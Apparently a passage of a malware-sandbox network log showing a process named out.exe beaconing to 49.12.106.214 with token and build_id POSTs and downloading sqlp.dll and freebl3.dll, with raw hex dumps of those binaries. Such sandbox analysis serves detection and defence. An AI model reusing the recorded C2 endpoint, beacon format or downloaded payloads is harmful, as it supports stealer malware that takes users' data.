                                                                                                                                                                                        2024-10-07 18:35:27 UTC5801OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------KEHJKJDGCGDAKFHIDBGCCont
                                                                                                                                                                                        2024-10-07 18:35:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:28 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        7192.168.2.54981049.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:28 UTC194OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:29 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:29 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 2459136
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:29 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                        Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8
                                                                                                                                                                                        Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24
                                                                                                                                                                                        Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b
                                                                                                                                                                                        Data Ascii: D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                        Data Ascii: 2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                        Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc
                                                                                                                                                                                        Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b
                                                                                                                                                                                        Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                        2024-10-07 18:35:29 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10
                                                                                                                                                                                        Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        8192.168.2.54983149.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:31 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 829
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:31 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------CGHDAKKJJJKJKECBGCGDCont
                                                                                                                                                                                        2024-10-07 18:35:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:32 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        9192.168.2.54983949.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:32 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDG
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 437
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:32 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------BKJEGDGIJECGCBGCGHDGCont
                                                                                                                                                                                        2024-10-07 18:35:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:33 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        10192.168.2.54985149.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:34 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 437
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:34 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HCFIIIJJKJKFHIDGDBAKCont
                                                                                                                                                                                        2024-10-07 18:35:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        11192.168.2.54986049.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:35 UTC197OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:36 UTC260INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:36 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 685392
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:36 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3
                                                                                                                                                                                        Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
